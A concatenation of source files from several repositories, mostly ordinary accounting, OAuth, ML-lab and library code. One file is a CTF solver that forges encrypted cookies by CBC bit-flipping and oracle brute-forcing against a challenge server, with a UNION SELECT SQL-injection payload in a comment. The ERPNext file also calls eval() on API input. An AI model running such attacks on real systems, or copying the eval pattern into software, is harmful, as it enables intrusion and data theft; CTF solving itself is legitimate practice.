"against_voucher": d.against_voucher or d.against_invoice or d.against_jv or d.against_sales_order or d.against_purchase_order, "remarks": self.remark, "cost_center": d.cost_center }) ) if gl_map: make_gl_entries(gl_map, cancel=cancel, adv_adj=adv_adj) def get_balance(self): if not self.get('accounts'): msgprint(_("'Entries' cannot be empty"), raise_exception=True) else: flag, self.total_debit, self.total_credit = 0, 0, 0 diff = flt(self.difference, self.precision("difference")) # If any row without amount, set the diff on that row for d in self.get('accounts'): if not d.credit and not d.debit and diff != 0: if diff>0: d.credit = diff elif diff<0: d.debit = diff flag = 1 # Set the diff in a new row if flag == 0 and diff != 0: jd = self.append('accounts', {}) if diff>0: jd.credit = abs(diff) elif diff<0: jd.debit = abs(diff) self.validate_debit_and_credit() def get_outstanding_invoices(self): self.set('accounts', []) total = 0 for d in self.get_values(): total += flt(d.outstanding_amount, self.precision("credit", "accounts")) jd1 = self.append('accounts', {}) jd1.account = d.account jd1.party = d.party if self.write_off_based_on == 'Accounts Receivable': jd1.party_type = "Customer" jd1.credit = flt(d.outstanding_amount, self.precision("credit", "accounts")) jd1.against_invoice = cstr(d.name) elif self.write_off_based_on == 'Accounts Payable': jd1.party_type = "Supplier" jd1.debit = flt(d.outstanding_amount, self.precision("debit", "accounts")) jd1.against_voucher = cstr(d.name) jd2 = self.append('accounts', {}) if self.write_off_based_on == 'Accounts Receivable': jd2.debit = total elif self.write_off_based_on == 'Accounts Payable': jd2.credit = total self.validate_debit_and_credit() def get_values(self): cond = " and outstanding_amount <= {0}".format(self.write_off_amount) \ if flt(self.write_off_amount) > 0 else "" if self.write_off_based_on == 'Accounts Receivable': return frappe.db.sql("""select name, debit_to as account, customer as party, outstanding_amount from `tabSales Invoice` where docstatus = 1 and company = %s and outstanding_amount > 0 %s""" % ('%s', cond), self.company, as_dict=True) elif self.write_off_based_on == 'Accounts Payable': return frappe.db.sql("""select name, credit_to as account, supplier as party, outstanding_amount from `tabPurchase Invoice` where docstatus = 1 and company = %s and outstanding_amount > 0 %s""" % ('%s', cond), self.company, as_dict=True) def update_expense_claim(self): for d in self.accounts: if d.against_expense_claim: amt = frappe.db.sql("""select sum(debit) as amt from `tabJournal Entry Account` where against_expense_claim = %s and docstatus = 1""", d.against_expense_claim ,as_dict=1)[0].amt frappe.db.set_value("Expense Claim", d.against_expense_claim , "total_amount_reimbursed", amt) def validate_expense_claim(self): for d in self.accounts: if d.against_expense_claim: sanctioned_amount, reimbursed_amount = frappe.db.get_value("Expense Claim", d.against_expense_claim, ("total_sanctioned_amount", "total_amount_reimbursed")) pending_amount = flt(sanctioned_amount) - flt(reimbursed_amount) if d.debit > pending_amount: frappe.throw(_("Row No {0}: Amount cannot be greater than Pending Amount against Expense Claim {1}. Pending Amount is {2}".format(d.idx, d.against_expense_claim, pending_amount))) def validate_credit_debit_note(self): if self.stock_entry: if frappe.db.get_value("Stock Entry", self.stock_entry, "docstatus") != 1: frappe.throw(_("Stock Entry {0} is not submitted").format(self.stock_entry)) if frappe.db.exists({"doctype": "Journal Entry", "stock_entry": self.stock_entry, "docstatus":1}): frappe.msgprint(_("Warning: Another {0} # {1} exists against stock entry {2}".format(self.voucher_type, self.name, self.stock_entry))) def validate_empty_accounts_table(self): if not self.get('accounts'): frappe.throw("Accounts table cannot be blank.") @frappe.whitelist() def get_default_bank_cash_account(company, voucher_type, mode_of_payment=None): from erpnext.accounts.doctype.sales_invoice.sales_invoice import get_bank_cash_account if mode_of_payment: account = get_bank_cash_account(mode_of_payment, company) if account.get("account"): account.update({"balance": get_balance_on(account.get("account"))}) return account if voucher_type=="Bank Entry": account = frappe.db.get_value("Company", company, "default_bank_account") if not account: account = frappe.db.get_value("Account", {"company": company, "account_type": "Bank", "is_group": 0}) elif voucher_type=="Cash Entry": account = frappe.db.get_value("Company", company, "default_cash_account") if not account: account = frappe.db.get_value("Account", {"company": company, "account_type": "Cash", "is_group": 0}) if account: return { "account": account, "balance": get_balance_on(account) } @frappe.whitelist() def get_payment_entry_from_sales_invoice(sales_invoice): from erpnext.accounts.utils import get_balance_on si = frappe.get_doc("Sales Invoice", sales_invoice) jv = get_payment_entry(si) jv.remark = 'Payment received against Sales Invoice {0}. {1}'.format(si.name, si.remarks) # credit customer jv.get("accounts")[0].account = si.debit_to jv.get("accounts")[0].party_type = "Customer" jv.get("accounts")[0].party = si.customer jv.get("accounts")[0].balance = get_balance_on(si.debit_to) jv.get("accounts")[0].party_balance = get_balance_on(party=si.customer, party_type="Customer") jv.get("accounts")[0].credit = si.outstanding_amount jv.get("accounts")[0].against_invoice = si.name # debit bank jv.get("accounts")[1].debit = si.outstanding_amount return jv.as_dict() @frappe.whitelist() def get_payment_entry_from_purchase_invoice(purchase_invoice): pi = frappe.get_doc("Purchase Invoice", purchase_invoice) jv = get_payment_entry(pi) jv.remark = 'Payment against Purchase Invoice {0}. {1}'.format(pi.name, pi.remarks) # credit supplier jv.get("accounts")[0].account = pi.credit_to jv.get("accounts")[0].party_type = "Supplier" jv.get("accounts")[0].party = pi.supplier jv.get("accounts")[0].balance = get_balance_on(pi.credit_to) jv.get("accounts")[0].party_balance = get_balance_on(party=pi.supplier, party_type="Supplier") jv.get("accounts")[0].debit = pi.outstanding_amount jv.get("accounts")[0].against_voucher = pi.name # credit bank jv.get("accounts")[1].credit = pi.outstanding_amount return jv.as_dict() def get_payment_entry(doc): bank_account = get_default_bank_cash_account(doc.company, "Bank Entry") jv = frappe.new_doc('Journal Entry') jv.voucher_type = 'Bank Entry' jv.company = doc.company jv.fiscal_year = doc.fiscal_year jv.append("accounts") d2 = jv.append("accounts") if bank_account: d2.account = bank_account["account"] d2.balance = bank_account["balance"] return jv @frappe.whitelist() def get_opening_accounts(company): """get all balance sheet accounts for opening entry""" accounts = frappe.db.sql_list("""select name from tabAccount where is_group=0 and report_type='Balance Sheet' and company=%s""", company) return [{"account": a, "balance": get_balance_on(a)} for a in accounts] def get_against_jv(doctype, txt, searchfield, start, page_len, filters): return frappe.db.sql("""select jv.name, jv.posting_date, jv.user_remark from `tabJournal Entry` jv, `tabJournal Entry Account` jv_detail where jv_detail.parent = jv.name and jv_detail.account = %s and ifnull(jv_detail.party, '') = %s and (ifnull(jv_detail.against_invoice, '') = '' and ifnull(jv_detail.against_voucher, '') = '' and ifnull(jv_detail.against_jv, '') = '' ) and jv.docstatus = 1 and jv.{0} like %s order by jv.name desc limit %s, %s""".format(searchfield), (filters.get("account"), cstr(filters.get("party")), "%{0}%".format(txt), start, page_len)) @frappe.whitelist() def get_outstanding(args): args = eval(args) if args.get("doctype") == "Journal Entry": condition = " and party=%(party)s" if args.get("party") else "" against_jv_amount = frappe.db.sql(""" select sum(ifnull(debit, 0)) - sum(ifnull(credit, 0)) from `tabJournal Entry Account` where parent=%(docname)s and account=%(account)s {0} and ifnull(against_invoice, '')='' and ifnull(against_voucher, '')='' and ifnull(against_jv, '')=''""".format(condition), args) against_jv_amount = flt(against_jv_amount[0][0]) if against_jv_amount else 0 if against_jv_amount > 0: return {"credit": against_jv_amount} else: return {"debit": -1* against_jv_amount} elif args.get("doctype") == "Sales Invoice": return { "credit": flt(frappe.db.get_value("Sales Invoice", args["docname"], "outstanding_amount")) } elif args.get("doctype") == "Purchase Invoice": return { "debit": flt(frappe.db.get_value("Purchase Invoice", args["docname"], "outstanding_amount")) } @frappe.whitelist() def get_party_account_and_balance(company, party_type, party): from erpnext.accounts.party import get_party_account account = get_party_account(company, party, party_type) account_balance = get_balance_on(account=account) party_balance = get_balance_on(party_type=party_type, party=party) return { "account": account, "balance": account_balance, "party_balance": party_balance }
avsd/django-allauth
refs/heads/master
allauth/socialaccount/providers/foursquare/views.py
71
import requests from allauth.socialaccount.providers.oauth2.views import (OAuth2Adapter, OAuth2LoginView, OAuth2CallbackView) from .provider import FoursquareProvider class FoursquareOAuth2Adapter(OAuth2Adapter): provider_id = FoursquareProvider.id access_token_url = 'https://foursquare.com/oauth2/access_token' # Issue ?? -- this one authenticates over and over again... # authorize_url = 'https://foursquare.com/oauth2/authorize' authorize_url = 'https://foursquare.com/oauth2/authenticate' profile_url = 'https://api.foursquare.com/v2/users/self' def complete_login(self, request, app, token, **kwargs): # Foursquare needs a version number for their API requests as documented here https://developer.foursquare.com/overview/versioning resp = requests.get(self.profile_url, params={'oauth_token': token.token, 'v': '20140116'}) extra_data = resp.json()['response']['user'] return self.get_provider().sociallogin_from_response(request, extra_data) oauth2_login = OAuth2LoginView.adapter_view(FoursquareOAuth2Adapter) oauth2_callback = OAuth2CallbackView.adapter_view(FoursquareOAuth2Adapter)
itzzshirlayyy/Online_Ordering
refs/heads/master
venv/lib/python2.7/site-packages/pip/_vendor/cachecontrol/compat.py
317
try: from urllib.parse import urljoin except ImportError: from urlparse import urljoin try: import cPickle as pickle except ImportError: import pickle from pip._vendor.requests.packages.urllib3.response import HTTPResponse from pip._vendor.requests.packages.urllib3.util import is_fp_closed
hohoins/ml
refs/heads/master
hunkim/ml_lab_05.py
1
# 참고자료 # 모두를 위한 머신러닝/딥러닝 강의 # 홍콩과기대 김성훈 # http://hunkim.github.io/ml import tensorflow as tf import numpy as np # Data xy = np.loadtxt('ml_lab_05.txt', unpack=True, dtype='float32') x_data = xy[0:-1] y_data = xy[-1] X = tf.placeholder(tf.float32) Y = tf.placeholder(tf.float32) # variable W = tf.Variable(tf.random_uniform([1, 3], -1.0, 1.0)) # Hypothesis h = tf.matmul(W, X) hypothesis = tf.div(1.0, 1.0 + tf.exp(-h)) # Cost cost = -tf.reduce_mean(Y*tf.log(hypothesis) + (1-Y)*tf.log(1-hypothesis)) # Gradient descent algorithm a = tf.Variable(0.1) optimizer = tf.train.GradientDescentOptimizer(a) train = optimizer.minimize(cost) # init init = tf.global_variables_initializer() sess = tf.Session() sess.run(init) # Train for step in range(2001): sess.run(train, feed_dict={X: x_data, Y: y_data}) if step % 20 == 0: print(step, sess.run(cost, feed_dict={X: x_data, Y: y_data}), sess.run(W)) # predict print(sess.run(hypothesis, feed_dict={X: [[1], [2], [2]]}) > 0.5) print(sess.run(hypothesis, feed_dict={X: [[1], [5], [5]]}) > 0.5) print(sess.run(hypothesis, feed_dict={X: [[1, 1], [4, 3], [3, 5]]}) > 0.5)
rbaindourov/v8-inspector
refs/heads/master
Source/chrome/tools/telemetry/telemetry/story/__init__.py
5
# Copyright 2015 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. # TODO (aiolos): replace with user_story/__init__.py in subsequent cl.
apigee/henchman
refs/heads/master
modules/curl/curl/requests/requests/packages/chardet/compat.py
2942
######################## BEGIN LICENSE BLOCK ######################## # Contributor(s): # Ian Cordasco - port to Python # # This library is free software; you can redistribute it and/or # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. # # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### import sys if sys.version_info < (3, 0): base_str = (str, unicode) else: base_str = (bytes, str) def wrap_ord(a): if sys.version_info < (3, 0) and isinstance(a, base_str): return ord(a) else: return a
junhuac/MQUIC
refs/heads/master
depot_tools/third_party/boto/cacerts/__init__.py
260
# Copyright 2010 Google Inc. # All rights reserved. # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, dis- # tribute, sublicense, and/or sell copies of the Software, and to permit # persons to whom the Software is furnished to do so, subject to the fol- # lowing conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS # OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL- # ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT # SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, # WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS # IN THE SOFTWARE. #
vsoch/docfish
refs/heads/master
docfish/apps/main/urls/collaborate.py
1
''' Copyright (c) 2017 Vanessa Sochat Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ''' from django.conf.urls import url import docfish.apps.main.views as views urlpatterns = [ # Change / add contributors url(r'^contributors/(?P<cid>\d+)/(?P<uid>.+?)/remove$',views.remove_contributor,name='remove_contributor'), url(r'^contributors/(?P<cid>\d+)/add$',views.add_contributor,name='add_contributor'), url(r'^contributors/(?P<cid>\d+)/edit$',views.edit_contributors,name='edit_contributors'), url(r'^start$', views.collection_chooser, name="collection_chooser"), url(r'^teams/(?P<tid>.+?)/collection/(?P<cid>.+?)/start$', views.team_portal, name="team_portal"), url(r'^teams/(?P<tid>.+?)/video$', views.team_video, name="team_video"), # Video #url(r'^teams/video/describe$',views.video_describe_web,name='video_describe_web'), ]
SujaySKumar/django
refs/heads/master
tests/max_lengths/models.py
438
from django.db import models class PersonWithDefaultMaxLengths(models.Model): email = models.EmailField() vcard = models.FileField(upload_to='/tmp') homepage = models.URLField() avatar = models.FilePathField() class PersonWithCustomMaxLengths(models.Model): email = models.EmailField(max_length=250) vcard = models.FileField(upload_to='/tmp', max_length=250) homepage = models.URLField(max_length=250) avatar = models.FilePathField(max_length=250)
Qwaz/solved-hacking-problem
refs/heads/master
Codegate/2017 Quals/2d-life/solver.py
1
from base64 import b64decode, b64encode import urllib import os import sys import requests # Filters: ' _ in (( pro or and group # Columns: no, rank URL = 'http://110.10.212.147:24135/?p=secret_login' cookie = 'QUWBPscLRhg%3D%7CKTwXZ6BPHP%2FSLTJWZnvk3OScLSc5%2F29PdAaCwsI5DmssvUiJtPmnjPNJGRmvLRccEFf3UKu4bklun1%2BCG0MM7w%3D%3D' cookie = urllib.unquote(cookie) iv, data = map(b64decode, cookie.split('|')) ''' MESSAGE \ FROM SPY\ <!--TABL\ E:agents\ NUMBER \ OF COLUM\ NS:5-->;\ SPY;66\x02\x02 ''' data = data def generate_cookie(iv, data): return urllib.quote('|'.join(map(b64encode, (iv, data)))) def string_xor(s1, s2): assert(len(s1) == len(s2)) ret = '' for i in range(len(s1)): ret += chr(ord(s1[i]) ^ ord(s2[i])) return ret def oracle_pad(msg): remainder = 8 - len(msg) % 8 msg += chr(remainder)*remainder return msg def send_payload(payload): fake = generate_cookie(payload[:8], payload[8:]) r = requests.get(URL, cookies={'identify': fake}) result = r.content.split('<title>liiumlntl Iogln</title>\n')[1] if 'Is that all? HACKER?' in result: print '!! Hacking Detected !!' return 'HACK' if 'Hello, ' in result: after_hello = result[20:] if not after_hello.startswith('<br>'): return after_hello return None # NAME & RANK should not contain ; NAME = sys.argv[1] RANK = sys.argv[2] # 0 union select 1,2,a.4,4,5 from (select 1,2,3,4,5 union select * from agents where rank=0 limit 1,1)a target = oracle_pad(';' + NAME + ';' + RANK) last_block = 'SPY;66\x02\x02' tail = string_xor(data[-16:-8], string_xor(last_block, target[-8:]))+data[-8:] num_block = len(target) // 8 + 1 for block_idx in range(num_block-3, -1, -1): dummy = os.urandom(7) while send_payload(chr(0) + dummy + tail): dummy = os.urandom(7) # inject ; success = False for byte in range(256): payload = chr(byte) + dummy + tail print "Trying block {}, byte {}".format(block_idx, byte) after_hello = send_payload(payload) if after_hello and after_hello != 'HACK' and not after_hello.startswith(RANK): tail = string_xor(target[8*(block_idx):8*(block_idx+1)], string_xor(chr(byte)+dummy, ';'+after_hello[:7])) + tail success = True break if not success: print '!! invalid payload !!' exit(0) fake = generate_cookie(tail[:8], tail[8:]) r = requests.get(URL, cookies={'identify': fake}) result = r.content.split('<title>liiumlntl Iogln</title>\n')[1] print result print fake
mattrobenolt/django
refs/heads/master
tests/template_tests/syntax_tests/test_list_index.py
521
from django.test import SimpleTestCase from ..utils import setup class ListIndexTests(SimpleTestCase): @setup({'list-index01': '{{ var.1 }}'}) def test_list_index01(self): """ List-index syntax allows a template to access a certain item of a subscriptable object. """ output = self.engine.render_to_string('list-index01', {'var': ['first item', 'second item']}) self.assertEqual(output, 'second item') @setup({'list-index02': '{{ var.5 }}'}) def test_list_index02(self): """ Fail silently when the list index is out of range. """ output = self.engine.render_to_string('list-index02', {'var': ['first item', 'second item']}) if self.engine.string_if_invalid: self.assertEqual(output, 'INVALID') else: self.assertEqual(output, '') @setup({'list-index03': '{{ var.1 }}'}) def test_list_index03(self): """ Fail silently when the list index is out of range. """ output = self.engine.render_to_string('list-index03', {'var': None}) if self.engine.string_if_invalid: self.assertEqual(output, 'INVALID') else: self.assertEqual(output, '') @setup({'list-index04': '{{ var.1 }}'}) def test_list_index04(self): """ Fail silently when variable is a dict without the specified key. """ output = self.engine.render_to_string('list-index04', {'var': {}}) if self.engine.string_if_invalid: self.assertEqual(output, 'INVALID') else: self.assertEqual(output, '') @setup({'list-index05': '{{ var.1 }}'}) def test_list_index05(self): """ Dictionary lookup wins out when dict's key is a string. """ output = self.engine.render_to_string('list-index05', {'var': {'1': "hello"}}) self.assertEqual(output, 'hello') @setup({'list-index06': '{{ var.1 }}'}) def test_list_index06(self): """ But list-index lookup wins out when dict's key is an int, which behind the scenes is really a dictionary lookup (for a dict) after converting the key to an int. """ output = self.engine.render_to_string('list-index06', {"var": {1: "hello"}}) self.assertEqual(output, 'hello') @setup({'list-index07': '{{ var.1 }}'}) def test_list_index07(self): """ Dictionary lookup wins out when there is a string and int version of the key. """ output = self.engine.render_to_string('list-index07', {"var": {'1': "hello", 1: "world"}}) self.assertEqual(output, 'hello')
zhuwenping/python-for-android
refs/heads/master
python3-alpha/python3-src/Tools/scripts/dutree.py
112
#! /usr/bin/env python3 # Format du output in a tree shape import os, sys, errno def main(): p = os.popen('du ' + ' '.join(sys.argv[1:]), 'r') total, d = None, {} for line in p.readlines(): i = 0 while line[i] in '0123456789': i = i+1 size = eval(line[:i]) while line[i] in ' \t': i = i+1 filename = line[i:-1] comps = filename.split('/') if comps[0] == '': comps[0] = '/' if comps[len(comps)-1] == '': del comps[len(comps)-1] total, d = store(size, comps, total, d) try: display(total, d) except IOError as e: if e.errno != errno.EPIPE: raise def store(size, comps, total, d): if comps == []: return size, d if comps[0] not in d: d[comps[0]] = None, {} t1, d1 = d[comps[0]] d[comps[0]] = store(size, comps[1:], t1, d1) return total, d def display(total, d): show(total, d, '') def show(total, d, prefix): if not d: return list = [] sum = 0 for key in d.keys(): tsub, dsub = d[key] list.append((tsub, key)) if tsub is not None: sum = sum + tsub ## if sum < total: ## list.append((total - sum, os.curdir)) list.sort() list.reverse() width = len(repr(list[0][0])) for tsub, key in list: if tsub is None: psub = prefix else: print(prefix + repr(tsub).rjust(width) + ' ' + key) psub = prefix + ' '*(width-1) + '|' + ' '*(len(key)+1) if key in d: show(tsub, d[key][1], psub) if __name__ == '__main__': main()
SickGear/SickGear
refs/heads/master
lib/enzyme/core.py
2
# -*- coding: utf-8 -*- # enzyme - Video metadata parser # Copyright 2011-2012 Antoine Bertin <diaoulael@gmail.com> # Copyright 2003-2006 Thomas Schueppel <stain@acm.org> # Copyright 2003-2006 Dirk Meyer <dischi@freevo.org> # # This file is part of enzyme. # # enzyme is free software; you can redistribute it and/or modify it under # the terms of the GNU General Public License as published by # the Free Software Foundation; either version 3 of the License, or # (at your option) any later version. # # enzyme is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with enzyme. If not, see <http://www.gnu.org/licenses/>. import re import logging from . import fourcc from . import language from .strutils import str_to_unicode, unicode_to_str from _23 import decode_str from six import PY2, string_types, text_type UNPRINTABLE_KEYS = ['thumbnail', 'url', 'codec_private'] MEDIACORE = ['title', 'caption', 'comment', 'size', 'type', 'subtype', 'timestamp', 'keywords', 'country', 'language', 'langcode', 'url', 'artist', 'mime', 'datetime', 'tags', 'hash'] AUDIOCORE = ['channels', 'samplerate', 'length', 'encoder', 'codec', 'format', 'samplebits', 'bitrate', 'fourcc', 'trackno', 'id', 'userdate', 'enabled', 'default', 'codec_private'] MUSICCORE = ['trackof', 'album', 'genre', 'discs', 'thumbnail'] VIDEOCORE = ['length', 'encoder', 'bitrate', 'samplerate', 'codec', 'format', 'samplebits', 'width', 'height', 'fps', 'aspect', 'trackno', 'fourcc', 'id', 'enabled', 'default', 'codec_private'] AVCORE = ['length', 'encoder', 'trackno', 'trackof', 'copyright', 'product', 'genre', 'writer', 'producer', 'studio', 'rating', 'actors', 'thumbnail', 'delay', 'image', 'video', 'audio', 'subtitles', 'chapters', 'software', 'summary', 'synopsis', 'season', 'episode', 'series'] # get logging object log = logging.getLogger(__name__) class Media(object): """ Media is the base class to all Media Metadata Containers. It defines the basic structures that handle metadata. Media and its derivates contain a common set of metadata attributes that is listed in keys. Specific derivates contain additional keys to the dublin core set that is defined in Media. """ media = None _keys = MEDIACORE table_mapping = {} def __init__(self, _hash=None): if _hash is not None: # create Media based on dict for key, value in _hash.items(): if isinstance(value, list) and value and isinstance(value[0], dict): value = [Media(x) for x in value] self._set(key, value) return self._keys = self._keys[:] self.tables = {} # Tags, unlike tables, are more well-defined dicts whose values are # either Tag objects, other dicts (for nested tags), or lists of either # (for multiple instances of the tag, e.g. actor). Where possible, # parsers should transform tag names to conform to the Official # Matroska tags defined at http://www.matroska.org/technical/specs/tagging/index.html # All tag names will be lower-cased. self.tags = Tags() for key in set(self._keys) - set(['media', 'tags']): setattr(self, key, None) # # unicode and string convertion for debugging # # TODO: Fix that mess def __unicode__(self): result = u'' # print normal attributes lists = [] for key in self._keys: value = getattr(self, key, None) if value is None or key == 'url': continue if isinstance(value, list): if not value: continue elif isinstance(value[0], string_types): # Just a list of strings (keywords?), so don't treat it specially. value = u', '.join(value) else: lists.append((key, value)) continue elif isinstance(value, dict): # Tables or tags treated separately. continue if key in UNPRINTABLE_KEYS: value = '<unprintable data, size=%d>' % len(value) result += u'| %10s: %s\n' % (decode_str(key), decode_str(value)) # print tags (recursively, to support nested tags). def print_tags(tags, suffix, show_label): result = '' for n, (name, tag) in enumerate(tags.items()): result += u'| %12s%s%s = ' % (u'tags: ' if n == 0 and show_label else '', suffix, name) if isinstance(tag, list): # TODO: doesn't support lists/dicts within lists. result += u'%s\n' % ', '.join(subtag.value for subtag in tag) else: result += u'%s\n' % (tag.value or '') if isinstance(tag, dict): result += print_tags(tag, ' ', False) return result result += print_tags(self.tags, '', True) # print lists for key, l in lists: for n, item in enumerate(l): label = '+-- ' + key.rstrip('s').capitalize() if key not in ['tracks', 'subtitles', 'chapters']: label += ' Track' result += u'%s #%d\n' % (label, n + 1) result += '| ' + re.sub(r'\n(.)', r'\n| \1', decode_str(item)) # print tables # FIXME: WTH? # if log.level >= 10: # for name, table in self.tables.items(): # result += '+-- Table %s\n' % str(name) # for key, value in table.items(): # try: # value = unicode(value) # if len(value) > 50: # value = u'<unprintable data, size=%d>' % len(value) # except (UnicodeDecodeError, TypeError): # try: # value = u'<unprintable data, size=%d>' % len(value) # except AttributeError: # value = u'<unprintable data>' # result += u'| | %s: %s\n' % (unicode(key), value) return result def __str__(self): return decode_str(self) def __repr__(self): if hasattr(self, 'url'): return '<%s %s>' % (str(self.__class__)[8:-2], self.url) else: return '<%s>' % (str(self.__class__)[8:-2]) # # internal functions # def _appendtable(self, name, hashmap): """ Appends a tables of additional metadata to the Object. If such a table already exists, the given tables items are added to the existing one. """ if name not in self.tables: self.tables[name] = hashmap else: # Append to the already existing table for k in hashmap.keys(): self.tables[name][k] = hashmap[k] def _set(self, key, value): """ Set key to value and add the key to the internal keys list if missing. """ if value is None and getattr(self, key, None) is None: return if isinstance(value, str): value = str_to_unicode(value) setattr(self, key, value) if key not in self._keys: self._keys.append(key) def _set_url(self, url): """ Set the URL of the source """ self.url = url def _finalize(self): """ Correct same data based on specific rules """ # make sure all strings are unicode for key in self._keys: if key in UNPRINTABLE_KEYS: continue value = getattr(self, key) if value is None: continue if key == 'image': if PY2 and isinstance(value, text_type): setattr(self, key, unicode_to_str(value)) continue if isinstance(value, str): setattr(self, key, str_to_unicode(value)) if isinstance(value, text_type): setattr(self, key, value.strip().rstrip().replace(u'\0', u'')) if isinstance(value, list) and value and isinstance(value[0], Media): for submenu in value: submenu._finalize() # copy needed tags from tables for name, table in self.tables.items(): mapping = self.table_mapping.get(name, {}) for tag, attr in mapping.items(): if self.get(attr): continue value = table.get(tag, None) if value is not None: if not isinstance(value, string_types): value = str_to_unicode(str(value)) elif isinstance(value, str): value = str_to_unicode(value) value = value.strip().rstrip().replace(u'\0', u'') setattr(self, attr, value) if 'fourcc' in self._keys and 'codec' in self._keys and self.codec is not None: # Codec may be a fourcc, in which case we resolve it to its actual # name and set the fourcc attribute. self.fourcc, self.codec = fourcc.resolve(self.codec) if 'language' in self._keys: self.langcode, self.language = language.resolve(self.language) # # data access # def __contains__(self, key): """ Test if key exists in the dict """ return hasattr(self, key) def get(self, attr, default=None): """ Returns the given attribute. If the attribute is not set by the parser return 'default'. """ return getattr(self, attr, default) def __getitem__(self, attr): """ Get the value of the given attribute """ return getattr(self, attr, None) def __setitem__(self, key, value): """ Set the value of 'key' to 'value' """ setattr(self, key, value) def has_key(self, key): """ Check if the object has an attribute 'key' """ return hasattr(self, key) def convert(self): """ Convert Media to dict. """ result = {} for k in self._keys: value = getattr(self, k, None) if isinstance(value, list) and value and isinstance(value[0], Media): value = [x.convert() for x in value] result[k] = value return result def keys(self): """ Return all keys for the attributes set by the parser. """ return self._keys class Collection(Media): """ Collection of Digial Media like CD, DVD, Directory, Playlist """ _keys = Media._keys + ['id', 'tracks'] def __init__(self): Media.__init__(self) self.tracks = [] class Tag(object): """ An individual tag, which will be a value stored in a Tags object. Tag values are strings (for binary data), unicode objects, or datetime objects for tags that represent dates or times. """ def __init__(self, value=None, langcode='und', binary=False): super(Tag, self).__init__() self.value = value self.langcode = langcode self.binary = binary def __unicode__(self): return decode_str(self.value) def __str__(self): return str(self.value) def __repr__(self): if not self.binary: return '<Tag object: %s>' % repr(self.value) else: return '<Binary Tag object: size=%d>' % len(self.value) @property def langcode(self): return self._langcode @langcode.setter def langcode(self, code): self._langcode, self.language = language.resolve(code) class Tags(dict, Tag): """ A dictionary containing Tag objects. Values can be other Tags objects (for nested tags), lists, or Tag objects. A Tags object is more or less a dictionary but it also contains a value. This is necessary in order to represent this kind of tag specification (e.g. for Matroska):: <Simple> <Name>LAW_RATING</Name> <String>PG</String> <Simple> <Name>COUNTRY</Name> <String>US</String> </Simple> </Simple> The attribute RATING has a value (PG), but it also has a child tag COUNTRY that specifies the country code the rating belongs to. """ def __init__(self, value=None, langcode='und', binary=False): super(Tags, self).__init__() self.value = value self.langcode = langcode self.binary = False class AudioStream(Media): """ Audio Tracks in a Multiplexed Container. """ _keys = Media._keys + AUDIOCORE class Music(AudioStream): """ Digital Music. """ _keys = AudioStream._keys + MUSICCORE def _finalize(self): """ Correct same data based on specific rules """ AudioStream._finalize(self) if self.trackof: try: # XXX Why is this needed anyway? if int(self.trackno) < 10: self.trackno = u'0%s' % int(self.trackno) except (AttributeError, ValueError): pass class VideoStream(Media): """ Video Tracks in a Multiplexed Container. """ _keys = Media._keys + VIDEOCORE class Chapter(Media): """ Chapter in a Multiplexed Container. """ _keys = ['enabled', 'name', 'pos', 'id'] def __init__(self, name=None, pos=0): Media.__init__(self) self.name = name self.pos = pos self.enabled = True class Subtitle(Media): """ Subtitle Tracks in a Multiplexed Container. """ _keys = ['enabled', 'default', 'langcode', 'language', 'trackno', 'title', 'id', 'codec'] def __init__(self, language=None): Media.__init__(self) self.language = language class AVContainer(Media): """ Container for Audio and Video streams. This is the Container Type for all media, that contain more than one stream. """ _keys = Media._keys + AVCORE def __init__(self): Media.__init__(self) self.audio = [] self.video = [] self.subtitles = [] self.chapters = [] def _finalize(self): """ Correct same data based on specific rules """ Media._finalize(self) if not self.length and len(self.video) and self.video[0].length: self.length = 0 # Length not specified for container, so use the largest length # of its tracks as container length. for track in self.video + self.audio: if track.length: self.length = max(self.length, track.length)
hectord/lettuce
refs/heads/master
tests/integration/lib/Django-1.3/tests/regressiontests/urlpatterns_reverse/included_named_urls.py
55
